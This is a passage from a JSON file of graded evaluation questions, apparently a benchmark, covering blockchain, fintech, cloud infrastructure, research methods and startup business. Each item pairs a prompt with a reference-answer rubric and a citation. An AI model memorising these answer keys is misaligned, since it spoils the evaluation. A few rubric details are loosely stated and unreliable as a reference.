        {"id": "blockchain-02", "difficulty": "intermediate", "prompt": "What's the difference between Proof of Work (PoW) and Proof of Stake (PoS)? Why did Ethereum migrate?", "rubric": "PoW: miners spend computational work (hashing) to propose blocks; energy-intensive, secured by hashpower (Bitcoin). PoS: validators stake currency to propose blocks; secured by economic stake. Ethereum's merge (Sept 2022): ~99.95% energy reduction, faster finality (12-min vs probabilistic), enables EIP-1559 staking economics. Tradeoff: 'nothing-at-stake' theoretical concern, addressed by slashing.", "citation": "https://ethereum.org/en/roadmap/merge/"},
        {"id": "blockchain-03", "difficulty": "expert", "prompt": "Reference SWC-107: identify the reentrancy vulnerability pattern in Solidity and the canonical fix.", "rubric": "Pattern: a contract sends ETH (call/transfer) before updating its own state, allowing the recipient (a malicious contract) to re-enter the sending function and exploit the still-unchanged state (DAO 2016 hack). Canonical fix: Checks-Effects-Interactions pattern — perform external calls LAST, after all state mutations. Or: use OpenZeppelin's ReentrancyGuard modifier.", "citation": "https://swcregistry.io/docs/SWC-107"},
        {"id": "blockchain-04", "difficulty": "intermediate", "prompt": "What's the difference between an EOA and a contract account in Ethereum?", "rubric": "EOA (Externally Owned Account): controlled by a private key, can send transactions, no code. Contract account: controlled by code, has code/storage, only acts when called by an EOA (directly or indirectly). Both have an address and balance. EIP-7702 (Pectra) blurs this — EOAs can temporarily delegate to contract code.", "citation": "https://ethereum.org/en/developers/docs/accounts/"},
        {"id": "blockchain-05", "difficulty": "expert", "prompt": "What is MEV (Maximal Extractable Value) and what's a common defense for users?", "rubric": "MEV: profit a block producer (or searcher) can extract by reordering, inserting, or censoring transactions in a block — typically through arbitrage, liquidations, or sandwich attacks. User defenses: private mempools (Flashbots Protect, MEV-Blocker), commit-reveal schemes, intent-based architectures (CowSwap), batch auctions, slippage limits.", "citation": "https://ethereum.org/en/developers/docs/mev/"},
        {"id": "blockchain-06", "difficulty": "beginner", "prompt": "What does it mean for a smart contract to be 'immutable' once deployed? How do real systems handle upgrades?", "rubric": "Once deployed, the contract's code is fixed at its address — bytecode cannot be modified. Upgrades use patterns: proxy contracts (delegatecall to an implementation address that can be swapped — UUPS, Transparent Proxy), or beacon proxies, or migration to a new contract with state copy.", "citation": "https://docs.openzeppelin.com/contracts/5.x/api/proxy"},
        {"id": "blockchain-07", "difficulty": "intermediate", "prompt": "What is gas in Ethereum? Why is it priced separately from ETH?", "rubric": "Gas: unit of computational cost — every EVM opcode has a fixed gas cost. Transactions specify max gas + gas price. Decoupled from ETH so the protocol can adjust the gas-to-USD ratio independently of ETH price (via EIP-1559 base fee that adjusts each block based on demand). Gas is priced in gwei (10^-9 ETH).", "citation": "https://ethereum.org/en/developers/docs/gas/"},
        {"id": "blockchain-08", "difficulty": "expert", "prompt": "What's the difference between an L2 rollup and a sidechain? Give one example of each.", "rubric": "L2 rollup: batches transactions off-chain but POSTS data + proofs to L1, inheriting L1 security. Optimistic (assume valid, fraud proofs — Arbitrum, Optimism) or ZK (validity proofs — zkSync, Starknet, Polygon zkEVM, Scroll). Sidechain: independent chain with own validators/consensus, periodic checkpoints to L1 — does NOT inherit L1 security (Polygon PoS, Ronin). Rollups are strictly more secure.", "citation": "https://ethereum.org/en/developers/docs/scaling/"},
        {"id": "blockchain-09", "difficulty": "intermediate", "prompt": "What's the difference between ERC-20 and ERC-721? When would you use each?", "rubric": "ERC-20: fungible tokens — interchangeable units of equal value (USDC, DAI, governance tokens). ERC-721: non-fungible tokens — each token has a unique tokenId and metadata (NFTs, deeds, identity tokens). ERC-1155 is a hybrid (multi-token, both fungible and NFT in one contract).", "citation": "https://eips.ethereum.org/EIPS/eip-721"},
        {"id": "blockchain-10", "difficulty": "expert", "prompt": "Reference SWC-101: explain integer overflow/underflow in Solidity. Why is it less of an issue in Solidity 0.8+?", "rubric": "SWC-101: arithmetic operations wrap around on overflow/underflow (uint256 max + 1 = 0 in <=0.7), enabling exploits like infinite token minting or balance underflow to huge numbers. Solidity 0.8+ checks arithmetic by default and reverts on over/underflow. The `unchecked { ... }` block opts out for gas savings in safe contexts (e.g., loop counters with known bounds).", "citation": "https://swcregistry.io/docs/SWC-101"},
        {"id": "blockchain-11", "difficulty": "beginner", "prompt": "What is a private key in the context of a blockchain wallet? What happens if you lose it?", "rubric": "Private key: 256-bit secret used to sign transactions, derives the public key and address. Losing it = losing access to all funds at that address; no recovery (no central authority). Mitigations: seed phrases (BIP-39 12/24 words), hardware wallets, multi-sig, social recovery wallets (Argent), MPC wallets.", "citation": "https://github.com/bitcoin/bips/blob/master/bip-0039.mediawiki"},
        {"id": "blockchain-12", "difficulty": "expert", "prompt": "What's the difference between a hard fork and a soft fork in blockchain consensus?", "rubric": "Soft fork: backward-compatible — old nodes accept new-rules blocks (new rules are a stricter subset). Doesn't split the chain (e.g., Bitcoin SegWit, Taproot). Hard fork: NOT backward-compatible — old nodes reject new-rules blocks, splitting the chain unless every node upgrades (Ethereum's hard forks like London/Shanghai/Pectra; or contentious splits like Ethereum Classic, Bitcoin Cash).", "citation": "https://ethereum.org/en/glossary/#fork"}
      ]
    },
    "fintech": {
      "description": "payments, trading systems, market data, regulatory compliance — generic explanations only, NOT investment advice",
      "questions": [
        {"id": "fintech-01", "difficulty": "beginner", "prompt": "What's the difference between ACH and a wire transfer for B2B payments?", "rubric": "ACH (Automated Clearing House): batch-processed, 1-3 business days settlement, low cost (~$0.20-1.50 per txn), reversible within ~60 days. Wire: real-time gross settlement, same-day, higher cost ($15-50 per txn), generally irrevocable once sent. Use ACH for recurring/non-urgent; wire for time-sensitive, large, or international.", "citation": "https://www.federalreserve.gov/paymentsystems/fedach_about.htm"},
        {"id": "fintech-02", "difficulty": "intermediate", "prompt": "What is PCI-DSS, and what does 'PCI scope reduction' mean for a merchant?", "rubric": "PCI-DSS: Payment Card Industry Data Security Standard — required for any entity that stores/processes/transmits cardholder data (CHD). PCI scope = systems/processes within DSS audit boundaries. Scope reduction strategies: tokenization (replace PAN with token issued by processor), iframes/redirects to processor's hosted page, P2PE (point-to-point encryption), network segmentation. Less scope = less audit cost + smaller attack surface.", "citation": "https://www.pcisecuritystandards.org/document_library/"},
        {"id": "fintech-03", "difficulty": "expert", "prompt": "What is a market maker, and how do they profit on the spread?", "rubric": "Market maker: continuously posts both bid and ask prices for an asset, providing liquidity. Profit on spread = ask - bid (if they buy at bid then sell at ask, they capture the spread). Risk: inventory exposure during volatile moves. Rebates from exchanges for providing liquidity (maker-taker model). Modern HFT MMs hold inventory for milliseconds, hedge in correlated venues.", "citation": "https://www.sec.gov/divisions/marketreg/mrnotices/2017/section3-mma-mt-final-version-09142017.pdf"},
        {"id": "fintech-04", "difficulty": "intermediate", "prompt": "What's the difference between a market order, limit order, and stop order?", "rubric": "Market: execute immediately at best available price (fills, but slippage risk). Limit: execute only at specified price or better (controls price, but may not fill). Stop: trigger an order when price crosses a threshold — stop-loss (sell when price falls below) or stop-buy (buy when price rises above); becomes a market order once triggered (or stop-limit if specified).", "citation": "https://www.sec.gov/investor/alerts/trading-basics.pdf"},
        {"id": "fintech-05", "difficulty": "expert", "prompt": "What is KYC and AML? How are they related but distinct?", "rubric": "KYC (Know Your Customer): identity verification + understanding customer's financial profile/risk. AML (Anti-Money Laundering): broader regulatory framework that includes KYC + transaction monitoring + suspicious activity reporting (SAR) + sanctions screening. KYC is a pillar of AML; AML is the umbrella. FATF sets international standards; jurisdictions implement (BSA/FinCEN in US, AMLD6 in EU, MAS notice 626 in Singapore).", "citation": "https://www.fatf-gafi.org/publications/fatfrecommendations/documents/fatf-recommendations.html"},
        {"id": "fintech-06", "difficulty": "intermediate", "prompt": "What does T+1 settlement mean for US equities, and when did it take effect?", "rubric": "T+1 = trade date plus 1 business day for settlement (cash and securities transfer). Took effect in US on May 28, 2024 (down from T+2). Reduces counterparty risk and capital requirements but compresses operational windows. EU and UK are moving to T+1 in October 2027.", "citation": "https://www.sec.gov/news/press-release/2023-29"},
        {"id": "fintech-07", "difficulty": "expert", "prompt": "What is a credit default swap (CDS), and what role did it play in the 2008 financial crisis?", "rubric": "CDS: insurance-like derivative — buyer pays premium, seller pays if a referenced entity defaults. Used for hedging or speculation. 2008: AIG sold massive CDS exposure on subprime MBS without sufficient capital reserves; when defaults hit, AIG couldn't pay, requiring $182B federal bailout. Highlighted shadow banking, opacity, counterparty risk concentration. Post-crisis: most CDS now centrally cleared via DTCC/ICE.", "citation": "https://www.federalreserve.gov/regreform/policy.htm"},
        {"id": "fintech-08", "difficulty": "beginner", "prompt": "Explain compound interest in 2-3 sentences with an example.", "rubric": "Interest earned on both principal and previously accrued interest. $1,000 at 5% compounded annually for 10 years = $1,000 * (1.05)^10 ≈ $1,629. Distinct from simple interest ($1,500). The Rule of 72: years to double ≈ 72 / interest_rate%.", "citation": "https://www.investor.gov/introduction-investing/investing-basics/glossary/compound-interest"},
        {"id": "fintech-09", "difficulty": "intermediate", "prompt": "What is the LIBOR scandal, and what replaced LIBOR?", "rubric": "LIBOR (London Interbank Offered Rate): benchmark for ~$300T of contracts. Banks self-reported submissions; in 2008-2012 several manipulated submissions for profit. Replaced (in USD) by SOFR (Secured Overnight Financing Rate) — based on actual repo market transactions, harder to manipulate. Other jurisdictions: SONIA (UK), €STR (EU), TONA (JP). LIBOR fully retired June 2023.", "citation": "https://www.federalreserve.gov/newsevents/pressreleases/bcreg20171108b.htm"},
        {"id": "fintech-10", "difficulty": "expert", "prompt": "What is Basel III, and why do banks care about Common Equity Tier 1 (CET1) ratio?", "rubric": "Basel III: international banking regulation framework (BCBS, post-2008). CET1 ratio = (CET1 capital) / (risk-weighted assets), minimum 4.5% + buffers (2.5% conservation buffer, 0-2.5% counter-cyclical, GSIB surcharge for big banks → 8-13% effective minimums). Banks care because: regulator-imposed dividend/buyback restrictions if breached; market signal of solvency; affects ability to lend (RWA capacity).", "citation": "https://www.bis.org/bcbs/basel3.htm"},
        {"id": "fintech-11", "difficulty": "intermediate", "prompt": "What's the difference between credit card and debit card from the merchant's perspective regarding fees?", "rubric": "Credit: higher interchange fees (~1.5-3%), revenue source for issuing bank, broader fraud protection (Reg Z). Debit: lower interchange (~0.05-0.1% + ~$0.20 flat per Durbin amendment for regulated banks >$10B assets), pulls from customer's bank account directly. Merchants pay less on debit; some incentivize via PIN-debit which has even lower fees than signature-debit.", "citation": "https://www.federalreserve.gov/paymentsystems/regii-about.htm"},
        {"id": "fintech-12", "difficulty": "expert", "prompt": "What's the difference between IFRS 9 expected credit loss (ECL) model and the prior incurred-loss model?", "rubric": "Incurred-loss (IAS 39): provision for losses only after objective evidence of impairment — pro-cyclical, slow to recognize losses (criticized post-2008). IFRS 9 ECL (effective 2018): forward-looking — recognize lifetime expected losses on Stage 2 (significant credit deterioration) and Stage 3 (credit-impaired) assets, 12-month ECL on Stage 1. Earlier loss recognition, more volatile P&L, requires macro-economic forecasting.", "citation": "https://www.ifrs.org/issued-standards/list-of-standards/ifrs-9-financial-instruments/"}
      ]
    },
    "infrastructure": {
      "description": "cloud + DevOps: AWS/GCP/Azure, Kubernetes, Terraform, observability, SRE",
      "questions": [
        {"id": "infrastructure-01", "difficulty": "beginner", "prompt": "What's the difference between IaaS, PaaS, and SaaS? Give one example of each.", "rubric": "IaaS (Infrastructure-as-a-Service): raw VMs/networking — AWS EC2, GCP Compute Engine. PaaS (Platform-as-a-Service): managed runtime, deploy code — Heroku, Vercel, Cloud Run. SaaS (Software-as-a-Service): finished application — Gmail, Salesforce, Notion. Stack metaphor: IaaS gives you the kitchen, PaaS gives you the appliances, SaaS serves you a meal.", "citation": "https://www.nist.gov/publications/nist-definition-cloud-computing"},
        {"id": "infrastructure-02", "difficulty": "intermediate", "prompt": "In Kubernetes, what's the difference between a Deployment, StatefulSet, and DaemonSet?", "rubric": "Deployment: stateless replicated pods, interchangeable, rolling updates. StatefulSet: ordered, stable network identities (pod-0, pod-1...), stable persistent storage per pod — for databases, distributed systems with leader election. DaemonSet: one pod per node — for log shippers, node-level monitoring, CNI plugins. Choose by stateless/stateful/per-node.", "citation": "https://kubernetes.io/docs/concepts/workloads/controllers/"},
        {"id": "infrastructure-03", "difficulty": "intermediate", "prompt": "What's the difference between horizontal and vertical scaling? When does one not work?", "rubric": "Vertical: bigger machine (more CPU/RAM). Limited by max instance size, single point of failure. Horizontal: more machines (load-balanced or sharded). Scales further but requires the workload to be parallelizable. Vertical doesn't work past hardware limits or when you need redundancy. Horizontal doesn't work for: stateful apps without distribution layer, single-threaded bottlenecks (Redis pre-cluster), workloads with global state.", "citation": "https://aws.amazon.com/builders-library/"},
        {"id": "infrastructure-04", "difficulty": "expert", "prompt": "Explain the SRE concept of error budget. How does it inform release cadence?", "rubric": "Error budget = (1 - SLO target) — e.g., 99.9% SLO means 0.1% allowed unavailability per period (~43 min/month). Errors below SLO consume budget. If budget is healthy: ship faster, take risks. If budget exhausted: freeze releases, focus on reliability. Aligns dev (ship features) and ops (stay reliable) incentives — both share the same budget.", "citation": "https://sre.google/sre-book/embracing-risk/"},
        {"id": "infrastructure-05", "difficulty": "intermediate", "prompt": "What is Terraform, and what does the term 'idempotent' mean for IaC?", "rubric": "Terraform: declarative IaC tool — describe desired state in HCL, Terraform computes the diff and applies changes. Idempotent: applying the same config repeatedly converges to the same state — re-running `terraform apply` on already-converged infra is a no-op. Critical for CI/CD reliability and disaster recovery.", "citation": "https://developer.hashicorp.com/terraform/intro"},
        {"id": "infrastructure-06", "difficulty": "expert", "prompt": "What's the difference between a Service Mesh and an API Gateway? Can they coexist?", "rubric": "API Gateway: edge — north-south traffic (clients to services), handles auth, rate limiting, routing, transformation. Examples: Kong, AWS API Gateway. Service Mesh: in-cluster — east-west traffic (service-to-service), handles mTLS, retries, circuit-breaking, observability. Examples: Istio, Linkerd. They coexist routinely: gateway at edge, mesh handles internal flow.", "citation": "https://istio.io/latest/about/service-mesh/"},
        {"id": "infrastructure-07", "difficulty": "beginner", "prompt": "What's the difference between TCP and HTTP? Is HTTPS at a different layer?", "rubric": "TCP: transport layer (L4) — reliable, ordered byte stream between two hosts. HTTP: application layer (L7) — request/response protocol over TCP. HTTPS: HTTP over TLS over TCP — TLS adds encryption and authentication at L6/7 boundary. So TCP < TLS < HTTP/HTTPS in the OSI sense.", "citation": "https://www.rfc-editor.org/rfc/rfc9110.html"},
        {"id": "infrastructure-08", "difficulty": "intermediate", "prompt": "What is a CDN, and why does it improve performance?", "rubric": "CDN (Content Delivery Network): geographically distributed servers that cache content close to users. Improves: latency (shorter physical distance), bandwidth (offloads origin), reliability (origin failure → CDN serves stale), security (DDoS absorption, TLS termination). Examples: Cloudflare, Fastly, Akamai. Modern CDNs also do edge compute (Workers, Edge Functions).", "citation": "https://developers.cloudflare.com/learning-paths/get-started/concepts/what-is-a-cdn/"},
        {"id": "infrastructure-09", "difficulty": "expert", "prompt": "Reference the four golden signals from Google SRE. List them and what they measure.", "rubric": "Latency (time to serve a request — distinguish successful vs failed requests). Traffic (rate of demand — RPS, network I/O). Errors (rate of failed requests — explicit failures + slow successes). Saturation (how 'full' the service is — CPU/memory/connection-pool utilization). Often abbreviated LATES or LSTE. Sufficient for most service health monitoring.", "citation": "https://sre.google/sre-book/monitoring-distributed-systems/"},
        {"id": "infrastructure-10", "difficulty": "intermediate", "prompt": "What's the difference between blue-green deployment and canary deployment?", "rubric": "Blue-green: two identical environments. Deploy new (green) alongside old (blue), switch traffic 100% at once when ready, keep blue for rollback. Fast cutover, fast rollback, requires 2x resources. Canary: deploy new version to a small subset (1-10%) of traffic, monitor, gradually increase. Slower but limits blast radius. Real systems often combine: blue-green at infra level + canary at traffic level.", "citation": "https://martinfowler.com/bliki/BlueGreenDeployment.html"},
        {"id": "infrastructure-11", "difficulty": "expert", "prompt": "What is etcd, and why is it the heart of a Kubernetes cluster?", "rubric": "etcd: distributed key-value store using Raft consensus, strongly consistent. Kubernetes uses etcd as the single source of truth for ALL cluster state — pods, services, secrets, configmaps, RBAC. Loss of etcd = loss of cluster state. Production etcd: 3 or 5 nodes (odd for Raft quorum), backed up regularly, low-latency disk. The kube-apiserver is the only direct client.", "citation": "https://kubernetes.io/docs/tasks/administer-cluster/configure-upgrade-etcd/"},
        {"id": "infrastructure-12", "difficulty": "intermediate", "prompt": "What's the difference between a hot and cold standby in disaster recovery?", "rubric": "Cold: secondary site has hardware/data backups but services are not running — start from zero on failover (RTO = hours). Warm: services running but reduced capacity, data periodically synced (RTO = minutes). Hot: identical capacity, real-time replication, automatic failover (RTO = seconds, RPO ≈ 0). Cost increases with heat; choose by RTO/RPO requirements.", "citation": "https://aws.amazon.com/architecture/well-architected/reliability-pillar/"}
      ]
    },
    "research": {
      "description": "research methodology, paper critique, statistics, reproducibility, peer review",
      "questions": [
        {"id": "research-01", "difficulty": "beginner", "prompt": "What's the difference between p-value and effect size? Why does a low p-value not mean a result is important?", "rubric": "P-value: probability of observing the data (or more extreme) under the null hypothesis. Low p = unlikely under null, but says nothing about the magnitude of the effect. Effect size: how large the actual difference is (Cohen's d, R², Pearson r). With huge n, tiny effects get tiny p-values but are practically meaningless. Always report both.", "citation": "https://www.amstat.org/asa/files/pdfs/P-ValueStatement.pdf"},
        {"id": "research-02", "difficulty": "intermediate", "prompt": "What is p-hacking, and how does pre-registration mitigate it?", "rubric": "P-hacking: running many analyses and reporting only the significant ones, or stopping data collection when p < 0.05, or selectively excluding outliers. Inflates Type I error rate. Pre-registration: state hypotheses, design, and analysis plan BEFORE seeing the data, in a public registry (OSF, AsPredicted, ClinicalTrials.gov). Forces honest reporting of all results, distinguishes confirmatory from exploratory analyses.", "citation": "https://www.cos.io/initiatives/prereg"},
        {"id": "research-03", "difficulty": "expert", "prompt": "What is the replication crisis, and which fields have been hit hardest?", "rubric": "Replication crisis: many published findings (especially in psychology, biomedical, economics) cannot be reproduced in independent studies. Open Science Collaboration (2015): only 36% of psych findings replicated. Hardest hit: social/cognitive psychology, biomedical (especially preclinical), nutritional epidemiology, parts of economics. Drivers: publication bias toward positive results, small samples, p-hacking, lack of pre-registration, weak statistical training.", "citation": "https://www.science.org/doi/10.1126/science.aac4716"},
        {"id": "research-04", "difficulty": "intermediate", "prompt": "What's the difference between systematic review and meta-analysis?", "rubric": "Systematic review: comprehensive structured literature search + appraisal of all relevant studies on a question (PRISMA guidelines). Qualitative narrative or quantitative synthesis. Meta-analysis: a quantitative method WITHIN a systematic review — statistically combine effect sizes from multiple studies for a pooled estimate (random-effects or fixed-effect model). All meta-analyses should be embedded in a systematic review; not all systematic reviews include meta-analysis.", "citation": "https://www.prisma-statement.org/"},
        {"id": "research-05", "difficulty": "expert", "prompt": "What is publication bias, and what's a common diagnostic for it?", "rubric": "Publication bias: positive/significant results more likely to be published than null/negative — meta-analyses skewed toward larger effects. Diagnostics: funnel plot (asymmetry suggests bias — small studies cluster on one side), Egger's test (statistical test of funnel asymmetry), trim-and-fill, p-curve analysis. Mitigation: registries (clinicaltrials.gov), publish-the-null journals, registered reports.", "citation": "https://methods.cochrane.org/bias/funnel-plot-asymmetry"},
        {"id": "research-06", "difficulty": "intermediate", "prompt": "Why is correlation not causation? Give one famous spurious correlation example.", "rubric": "Correlation = two variables move together. Causation requires: (1) covariation, (2) temporal precedence, (3) elimination of confounders, (4) plausible mechanism. Confounders/lurking variables can produce strong correlations without causal links. Example: ice cream sales correlate with drowning deaths (both caused by summer weather). Or: pirate count vs global temperature (Pastafarian classic). Tools to establish causation: RCTs, instrumental variables, regression discontinuity, difference-in-differences.", "citation": "https://en.wikipedia.org/wiki/Spurious_relationship"},
        {"id": "research-07", "difficulty": "expert", "prompt": "What's a randomized controlled trial (RCT), and why is it the gold standard for causal inference?", "rubric": "RCT: random assignment of subjects to treatment vs control groups. Random assignment ensures (in expectation) that confounders are balanced between groups, so any post-treatment difference is attributable to the treatment. Gold standard because: addresses both observable and unobservable confounders, supports causal claims. Limits: external validity (lab vs real world), ethical constraints (can't randomize harms), expense, sometimes infeasible.", "citation": "https://www.consort-statement.org/"},
        {"id": "research-08", "difficulty": "beginner", "prompt": "What is peer review, and what are 3 common forms?", "rubric": "Peer review: subject-matter experts evaluate a manuscript before publication. Forms: single-blind (reviewers know authors, authors don't know reviewers — most common), double-blind (neither side knows), open (both sides identified, sometimes review published alongside), post-publication (PubPeer, F1000Research). Each has tradeoffs in bias, accountability, speed.", "citation": "https://publicationethics.org/files/peer-review-guidelines_0.pdf"},
        {"id": "research-09", "difficulty": "expert", "prompt": "What does it mean for a study to be 'underpowered'? Why is power 0.8 the typical target?", "rubric": "Statistical power: probability of detecting a true effect of given size at a given significance level (1 - Type II error rate). Underpowered: insufficient sample size to reliably detect plausible effect sizes — null results are uninformative, significant results are inflated (Type M and Type S errors, Gelman). 0.8 is convention from Cohen — balances detection probability with cost. Modern best practice: pre-specified power analysis based on smallest effect size of interest.", "citation": "https://psycnet.apa.org/record/1988-98980-000 (Cohen 1988 — Statistical Power Analysis)"},
        {"id": "research-10", "difficulty": "intermediate", "prompt": "What is reproducibility vs replicability in science? They are not the same.", "rubric": "Reproducibility (computational): same data + same code → same result (re-running analysis). Replicability: same procedure on NEW data → same conclusion (independent re-experiment). Reproducibility is necessary but not sufficient — a study can be reproducible (analysis re-runs) but not replicable (effect doesn't survive re-collection). NASEM (2019) report formalized these definitions.", "citation": "https://nap.nationalacademies.org/catalog/25303/reproducibility-and-replicability-in-science"},
        {"id": "research-11", "difficulty": "expert", "prompt": "What is the file-drawer problem? How does it relate to publication bias?", "rubric": "File-drawer problem (Rosenthal 1979): null/negative results sit in researchers' file drawers, never submitted or published. Subset/cause of publication bias. Quantified by Rosenthal's fail-safe N — how many null studies it would take to nullify a meta-analytic effect. Solved by: registered reports (acceptance based on methods, before results), pre-registration, reporting guidelines, dedicated null-result journals.", "citation": "https://psycnet.apa.org/record/1979-27602-001"},
        {"id": "research-12", "difficulty": "intermediate", "prompt": "When reading a paper, what's the most important question to ask after reading the abstract?", "rubric": "What is the actual claim, and what evidence supports it? More specifically: (a) what's the population/sample? (b) what was actually measured? (c) what comparison group? (d) is the headline result the prespecified primary outcome or a post-hoc finding? (e) effect size + uncertainty (CI), not just p-value? Acceptable framings: 'Is the result the primary or exploratory analysis?' or 'What's the effect size with confidence interval?'", "citation": "https://www.equator-network.org/"}
      ]
    },
    "business": {
      "description": "business operations and strategy for technical founders: pricing, GTM, hiring, fundraising basics",
      "questions": [
        {"id": "business-01", "difficulty": "beginner", "prompt": "What's the difference between a SaaS company's MRR and ARR?", "rubric": "MRR (Monthly Recurring Revenue): predictable subscription revenue per month. ARR (Annual Recurring Revenue) = MRR × 12 (or summed annual contracts). Reported metrics that exclude one-time fees, services, transactional revenue. ARR is the headline number for SaaS valuation; MRR is the operational metric for ops/sales.", "citation": "https://www.bvp.com/atlas/saas-finance-and-operating-metrics"},
        {"id": "business-02", "difficulty": "intermediate", "prompt": "What is the rule of 40 in SaaS, and why does it matter?", "rubric": "Rule of 40: a healthy SaaS company's growth rate (%) + profit margin (%) ≥ 40. Captures the trade-off between growth and profitability — investors accept low margins from fast-growers and slower growth from profitable companies. Below 40: company's combined story is weak. Used as a heuristic in board reviews and term-sheet negotiations.", "citation": "https://www.bvp.com/atlas/the-rule-of-40-introduction"},
        {"id": "business-03", "difficulty": "expert", "prompt": "What's the difference between participating and non-participating preferred stock in a startup term sheet?", "rubric": "Both have liquidation preference (typically 1x): get their money back before common. Non-participating: choose between (a) 1x preference, OR (b) convert to common and take pro-rata share — whichever is greater. Participating: get the 1x preference AND pro-rata share of remaining proceeds (double-dip). Participating is more aggressive; recent founder-friendly markets default to non-participating with 1x cap. Caps on participating common in 2-3x scenarios.", "citation": "https://www.nvca.org/model-legal-documents/"},
        {"id": "business-04", "difficulty": "beginner", "prompt": "What's the difference between revenue, gross profit, and net profit?", "rubric": "Revenue (top line): total money in. Gross profit = revenue - COGS (direct costs of delivering the product). Net profit (bottom line) = revenue - all costs (COGS + opex + interest + taxes). Margins: gross margin = gross profit / revenue (e.g., SaaS often 70-90%); net margin = net profit / revenue (much smaller, often 0-30% for healthy SaaS).", "citation": "https://www.investor.gov/introduction-investing/investing-basics/glossary/income-statement"},
        {"id": "business-05", "difficulty": "intermediate", "prompt": "What is CAC and LTV, and what's a healthy LTV:CAC ratio for SaaS?", "rubric": "CAC (Customer Acquisition Cost): total sales+marketing spend / new customers acquired. LTV (Lifetime Value): expected total revenue from a customer over their lifetime; for subscription SaaS approximately = ARPU * gross_margin / churn_rate. Healthy LTV:CAC ratio for SaaS: 3:1 or higher. <1:1 is losing money on every customer; 5:1+ may indicate underinvestment in growth.", "citation": "https://www.bvp.com/atlas/saas-finance-and-operating-metrics"},
        {"id": "business-06", "difficulty": "expert", "prompt": "What's the difference between a SAFE and a convertible note? Which is more founder-friendly?", "rubric": "SAFE (Simple Agreement for Future Equity, YC 2013): equity-only — converts to shares at the next priced round, no interest, no maturity. Convertible note: debt — interest accrues, maturity date, can demand repayment if no priced round. SAFE is more founder-friendly (no interest, no debt overhang); convertible notes are more investor-friendly (downside protection). Post-money SAFE (2018) further protects investors against dilution between SAFE and priced round.", "citation": "https://www.ycombinator.com/documents"},
        {"id": "business-07", "difficulty": "intermediate", "prompt": "What is product-market fit (PMF), and what's one signal that you have it?", "rubric": "PMF: the product satisfies a strong market need — you're in a market that wants what you're selling, profitably. Signals: organic growth (users tell others), retention curves flatten (cohort doesn't churn to zero), waiting lists, customers buy without being convinced, '40% disappointed' Sean Ellis test (>40% would be very disappointed if product disappeared). Pre-PMF: every user takes effort to acquire and retain.", "citation": "https://review.firstround.com/how-superhuman-built-an-engine-to-find-product-market-fit"},
        {"id": "business-08", "difficulty": "beginner", "prompt": "What's the difference between a C-corp and an LLC in the US? Which do startups raising VC use?", "rubric": "C-corp: separate legal entity, double taxation (corporate + dividend), can issue multiple share classes (preferred + common), unlimited shareholders. LLC: pass-through taxation, simpler structure, but limited share class flexibility, complications for VC investment. Startups raising VC = Delaware C-corp (default for institutional investment, mature case law, supports preferred stock + ISOs).", "citation": "https://www.delaware.gov/services/businesses/"},
        {"id": "business-09", "difficulty": "expert", "prompt": "What is a 409A valuation, and why does it matter for ISO exercise?", "rubric": "409A: independent valuation of a private company's common stock for tax purposes (IRS Section 409A). Sets the strike price for incentive stock options (ISOs). Updated annually or after material events. Matters because: ISOs must be issued at or above 409A FMV — below it, employees face immediate ordinary income tax + penalties. Higher 409A → higher strike → less upside for new hires. Companies want low 409A early, push higher only after material progress.", "citation": "https://www.irs.gov/retirement-plans/section-409a-deferred-compensation-rules"},
        {"id": "business-10", "difficulty": "intermediate", "prompt": "What's the difference between an MOU and a contract? Is an MOU legally binding?", "rubric": "MOU (Memorandum of Understanding): typically non-binding statement of intent or framework for future contracts. Contract: legally binding agreement with offer, acceptance, consideration. CAN be binding if the language is binding (varies by jurisdiction and intent — Australia is more aggressive than US). Practice: explicitly state 'non-binding except for [confidentiality, exclusivity]' in MOUs to avoid ambiguity. LOIs and term sheets often have similar structure.", "citation": "https://www.law.cornell.edu/wex/contract"},
        {"id": "business-11", "difficulty": "expert", "prompt": "What's the difference between a pivot and a feature change? Give one famous startup pivot example.", "rubric": "Feature change: incremental adjustment within the existing product/customer/business model. Pivot: structural change — new customer segment, new value prop, new revenue model, new technology platform. Famous pivots: Slack (was a game company, Tiny Speck → Glitch → Slack), Twitter (Odeo podcast platform → status updates), Instagram (Burbn check-in app → photo sharing), YouTube (dating site → video sharing). A pivot resets PMF — a feature change refines it.", "citation": "https://hbr.org/2014/06/how-and-when-to-pivot"},
        {"id": "business-12", "difficulty": "intermediate", "prompt": "Define liquidation preference and walk through 1x non-participating in a $50M exit with $10M raised at 1x.", "rubric": "Liquidation preference: order and amount preferred shareholders receive on exit/liquidation before common. 1x non-participating means: investor can either take their $10M back OR convert to common and take pro-rata share. Pro-rata example: if VC owns 25%, conversion gives them 25% × $50M = $12.5M. Investor takes max($10M, $12.5M) = $12.5M (converts). Common gets the remaining $37.5M. If exit was $30M, conversion gives 25% × $30M = $7.5M, so VC takes the $10M preference instead.", "citation": "https://www.nvca.org/model-legal-documents/ (NVCA model term sheet)"}
      ]
    }
  }
}